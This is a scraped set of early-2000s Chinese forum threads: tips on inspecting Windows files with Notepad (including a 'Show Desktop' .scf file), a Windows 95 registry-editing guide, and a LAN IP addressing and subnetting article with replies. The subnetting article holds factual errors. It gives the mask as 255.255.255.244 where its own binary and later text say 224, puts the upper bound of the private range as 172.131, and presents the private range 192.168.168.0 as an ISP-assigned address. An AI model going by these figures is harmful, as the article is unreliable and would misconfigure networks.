51windows 海娃 积分：4495 发帖：1308 来自：湖南－山东 注册：2001-12-02 | 发表于 2002-02-26 23:06:14 按此观看51windows的个人资料 按此发邮件给51windows 访问51windows的主页 51windows 的 oicq 是528173,查看 528173 的资料 收藏该主题供以后查看 发送悄悄话给51windows 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看51windows的IP 我对操作系统有特殊的感兴趣！所以对它们了解的还行吧！在我学习的过程中，我觉得这个 方法不错！就是常到偿windows目录里的去看看！要在文件夹选项里显示所有文件！不然文件 里的系统文件你是看不到！ 有超级兔仔这方面的软件！在右键中加上一项！用记事本打开！一般的小文件没有默认的打 开方式的时候！你就可以用记事本来打开看看！ 这样你就会发现不少的windows秘密！ 当然平时要有耐心！慢慢来不懂就要问！ 现在网上也有很多教程！你可以边看边试！不要怕坏了！坏了不就是重装吗？昨天是二十六号！！我的同学有的怕上网！我说没什么的大不了重新分区重装吗！ 你用记事本打开过'显示桌面'吗 看看里面的代码 [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop 把上面代码另存为一个.scf文件，看看，是不是显示桌面了？ 把IconFile=explorer.exe,3里的3改成0-9，就会改变图标了！ Blueidea Web Team. Moderator Of Amphitheater Forum .::天天学习:好好向上::. www.51windows.com 51window_asp_Beta
渡江 高级用户 积分：300 发帖：83 来自： 注册：2002-02-04 | 发表于 2002-02-26 23:19:47 按此观看渡江的个人资料 按此发邮件给渡江 渡江 的 oicq 是1679907,查看 1679907 的资料 发送悄悄话给渡江 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看渡江的IP 二十六号?严重会把主板的bios也搞掉.. 渡江雪狼，难保自身.....
Fellow Fellow 积分：3698 发帖：1067 来自：sd.gd.cn 注册：2001-02-20 | 发表于 2002-02-27 00:10:54 按此观看Fellow的个人资料 按此发邮件给Fellow Fellow 的 oicq 是5144255,查看 5144255 的资料 发送悄悄话给Fellow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fellow的IP 用记事本看东西是我的习惯，但是我习惯用ultraedit......嘻嘻。 Xp The Future 3 还是那句：学师三日，天下无敌；学师三年，寸步难行。
yesbest 初级用户 积分：134 发帖：37 来自：宿州，安徽，中国 注册：2002-01-20 | 发表于 2002-02-28 04:04:25 按此观看yesbest的个人资料 按此发邮件给yesbest 访问yesbest的主页 yesbest 的 oicq 是9099711,查看 9099711 的资料 发送悄悄话给yesbest 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yesbest的IP 师傅，终于又找到你啦 对了，我知道有一个可用的文本编辑器，不过我的光盘里面的全部不能安装 哪里有没，我去下载，就是楼上的朋友说的那个 kelvinfeel@163.com
上一贴 | 下一贴
快速回复 主题：七分靠大胆！三分靠实践！！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


注册表修改方法 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
注册表修改方法

上一贴 | 下一贴
发表人 主题: 注册表修改方法
鸵鸟γδξπηφ

高级用户
积分：219
发帖：55
来自：
注册：2002-01-27
 发表于 2002-01-29 09:04:05 按此观看鸵鸟γδξπηφ的个人资料 按此发邮件给鸵鸟γδξπηφ 收藏该主题供以后查看 发送悄悄话给鸵鸟γδξπηφ 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看鸵鸟γδξπηφ的IP
一、直接修改注册表的基本方法
    Windows95利用注册表来管理所有的硬件和软件设置。注册表(Registry)提供了一个统一的数据库，并以分层的形式存储系统和应用程序配置数据。每次启动计算机时都会形成注册表，它的内容是由即插即用事件、机器的设置文件(System.dat)和用户信息(User.dat)以及在某种情况下由网络文件服务器施加的系统策略所组成，是一个存储着计算机配置信息的数据库文件，它取代了原系统所有组件和应用程序之INI文件的使用，实为Windows95系统的一个管理信息数据库，目前Windows95所有的系统管理归根结底都是通过注册表项的设置来实现的。因为注册表项繁多且信息可读性差，一旦修改错误，就可能导致系统不能启动，所以一般不主张让用户直接修改注册表。

    但对于熟悉注册表项设置的高级用户，如果使用控制面板和策略文件不能达到目的，也就只能采用这种最直接、最全面的处理方法。具体使用方法是把Windows95安装光盘中\Admin目录下的Regedit.exe(注册表编辑器)文件拷贝到本地硬盘上运行，去掉注册表只读方式，对系统注册表项进行修改，完成后应存盘退出。下次系统启动时，新设置就会生效。

二、间接修改注册表的简易方法
    如果您对注册表不是很了解，就不要冒然使用注册表编辑器直接编辑注册表。可以使用一种“温和”的方法——间接修改注册表，即向注册表中添加表项，可用注册表文本文件(.reg)来完成。

    在注册表文本文件的首行必须用命令字符串“REGEDIT”，其作用是通知系统调用regedit来完成注册信息的合并工作。接下来的每一行或代表一个键值的声明或者为注释性的说明信息。

    主键及其默认键值的声明格式为：

    根键\一级主键\二级主键\......=默认键值

    例如，欲在根键HKEY_CLASSES_ROOT的“*”主键下添加一个“压缩”主键，以便通过上下文菜单直接压缩选定的文件，其主键的声明如下：

    HKEY_CLASSES_ROOT\*\shell\压缩(&U)\command=C:\\dos\\arj.exe a Temp$%1其中，“shell”和“command”都是固定的，不能更改和替换，“shell”指明将要为上下文菜单中添加命令，“command”指明具体的命令行信息。另外还要注意，在等号右边的键值字符串中，如果要指明文件的路径，其中的“\”字符要使用"\\"代替，等号的前后还要添加一个起分隔作用的空格。

    凡是用分号开头的行，均为说明信息行，用户可以利用说明行给文件中的命令给以必要的注解，使命令便于理解。

    使用任何一个编辑器，编辑生成一个包含一系列主键声明行、说明行的列表，并将文件保存为以“.reg”为扩展名的文本文件，即创建了一个注册表文本文件。

三、备份注册表的方法
    不少安装程序(或你自己直接处理)都可能搞乱你系统的注册表，从而引发不测，所以我们应该定期地备份user.dat和system.dat文件。但目前的资源管理器(或者是DOS来)都不能直接复制这两个文件，我们最好利用专门工具：

    在Windows95CD-ROM安装盘中有一个可对注册表制作9个备份的程序：Cfgback.exe。使用时，需要先把Cfgback.exe文件从CD-ROM的\Other\Msic\Cfgback文件夹复制到c:\Windows，然后把Cfgback.hlp文件复制到c:\Windows\help。想制作备份时，只要双击Cfgbck.exe并遵循其提出的详细指导就行。详细方法请参见“注册表实用工具”栏目。

寂寞的《鸵鸟γδξπηφ》啊～～我在像野驴一样疯狂的奔跑！
上一贴 | 下一贴
快速回复 主题：注册表修改方法
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


局域网中的IP地址分配 - 经 典 论 坛

计算机技术
局域网中的IP地址分配

上一贴 | 下一贴
发表人 主题: 局域网中的IP地址分配
宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2002-02-01 18:24:04 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
发信人: hnyjchuhong(楚泓)
整理人: yurt(2001-10-23 11:50:37), 站内信件
在网络规划中，IP地址方案的设计至关重要，好的IP地址方案不仅可以减少网络负荷，还能为以后的网络扩展打下良好的基础。本文就网络规划中IP地址方案设计进行一些讨论，并给出一个IP地址方案设计实例。

一、IP地址和子网掩码

    IP地址用于在网络上标识唯一一台机器。根据RFC791的定义，IP地址由32位二进制数组成(四个字节)，表示为用圆点分成每组3位的12位十进制数字(xxx.xxx.xxx.xxx)每个3位数代表8位二进制数(一个字节)。由于1个字节所能表示的最大数为255，因此IP地址中每个字节可含有0～255之间的值。但0和255有特殊含义，255代表广播地址：IP地址中0用于指定网络地址号(若0在地址末端)或结点地址(若0在地址开始)。例如， 192?168?32?0指网络192.168.32.0，而0.0.0.62指网络上结点地址为62的计算机。

    根据IP地址中表示网络地址字节数的不同将IP地址划分为三类，A类，B类，C类。A类用于超大型网络(百万结点)，B类用于中等规模的网络(上千结点)，C类用于小网络(最多254个结点)。A类地址用第一个字节代表网络地址，后三个字代表结点地址。B类地址用前两个字节代表网络地址，后两个字节表示结点地址。C类地址则用前三个字节表示网络地址，第四个字节表示结点地址。见表1。

    网络设备根据IP地址的第一个字节来确定网络类型。A类网络第一个字节的第一个二进制位为0；B类网络第一个字节的前两个二进制位为10；C类网络第一个字节的前三位二进制位为110，见表2。换成十进制可见A类网络地址从1～127，B类网络地址从128～191，C类网络地址从192～223。224～239间的数有时称为D类，239以上的网络号保留。

    子网掩码用于找出IP地址中网络及结点地址部分。子网掩码长32位，其中1表示网络部分，0表示结点地址部分。A类，B类，C类网络的子网掩码见表3，如一个结点IP地址为192.168.202.195，子网掩码255.255.255.0，表示其网络地址为192.168.202，结点地址为195。

    有时为了方便网络管理，需要将网络划分为若干个网段。为此，必须打破传统的8位界限，从结点地址空间中“抢来”几位作为网络地址。具体说来，建立子网掩码需要以下两步：
    1、确定运行IP的网段数
    2、确定子网掩码

    首先，确定运行IP的网段数。例如，你的网络上有五个网段，但只让三个网段上的用户访问Internet，则只有这三个网段需要配置IP。在确定了IP网段数后，再确定从结点地址空间中截取几位才能为每个网段创建一个子网络号。方法是计算这些位数的组合值。比如，取两位，有四种组合(00、01、10、11)，取三位有八种组合(000、001、010、011、100、101、110、111)。需要注意的是，在这些组中须除去全0和全1的组合。因为在IP协议中规定了全0和全1的组合代表了网络地址和广播地址，所以如果我们需要将C类网络(192.168.123.0)划分为4个网段，需要截取结点地址的前3位作为网络地址，与之对应的子网掩码就是255.255.255.244(11111111.11111111.
11111111.11100000)，将此子网掩码用到地址192.168.123.0上得到的值见表4。

    可见，采用以上子网络方案，每个子网络有30个结点地址。通过从结点地址空间中截取几位作为网络地址的方法，可将网络划分为若干网段，方便了网络管理。

二、设计IP地址方案实例

    在网络规划的过程中，绘制一幅准确的网络图是不可缺少的。准确的网络文档对于日后的升级和分析问题是不可或缺的帮助。好的网络图应包含连接不同网段的各种网络设备的信息，比如路由器、网桥、网关的位置、IP地址，并用相应的网络地址标注各网段。若网络很小，只有一个网段，可同时画出其它关键网络设备(如服务器)，包括网络地址。如图所示这是一幅简单的网络图，其中五个网段经服务器互连(这里由服务器提供路由功能)，一个用于主干网连接其它网段。

    在设计IP地址方案之前，应考虑以下几个问题：
    ?是否将网络连入Internet
    ?是否将网络划分为若干网段以方便网络管理
    ?是采用静态IP地址分配还是动态IP地址分配

    如果不计划连到Internet上，则可用RFC1918中定义的非Internet连接的网络地址，称为“专用Internet地址分配”。RFC1918规定了不想连入Internet的IP地址分配指导原则。由Internet地址授权机构(IANA)控制IP地址分配方案中，留出了三类网络号，给不连到Internet上的专用网用，分别用于A，B和C类IP网，具体如下：
    10.0.0.0～10.255.255.255
    172.16.0.0～172.131.255.255
    192.168.0.0～192.168.255.255

    IANA保证这些网络号不会分配给连到Internet上的任何网络，因此任何人都可以自由的选择这些网络地址作为自己的网络地址。表5是采用保留IP地址的网络地址分配方案。

    如果计划将网络连入Internet，则需要向ISP申请一个网络地址。这里，我们假定得到了一个C类网络地址192.168.168.0。根据网络图所示，整个网络划分为5个网段，每个网段都使用IP，因此必须用至少能建5个子网的子网掩码。这里，我们采用的子网掩码是255.255.255.244。网络的IP地址分配方案如表6所示。

    不难看出，采用子网掩码255.255.255.224将网络划分为5个网段后，每个网段可用的IP地址数为30个。如果某个网段的结点数超过了30个，可采用动态IP地址分配协议(DHCIP)加以解决

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
肖天

超级用户
积分：354
发帖：92
来自：黑龙江省
注册：2001-06-28
 发表于 2002-02-02 18:19:11 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP
楼上文章所提到的表格1，2，。。6都在哪里？

good good study ,day day up!
mao

现任版主
积分：1694
发帖：691
来自：北京
注册：2000-07-23
 发表于 2002-02-03 03:38:40 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
说老实话,关于LAN中的子网划分不是那么容易弄明白的,我觉得在这的人大多数为软件高手
关于网络方面我觉得大家有个了解就行了,没有必要在这儿发这种文章.子网划分一般都是非常专业的人才作这个的

解决问题才有进步
解决问题才有进步
上一贴 | 下一贴
快速回复 主题：局域网中的IP地址分配
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索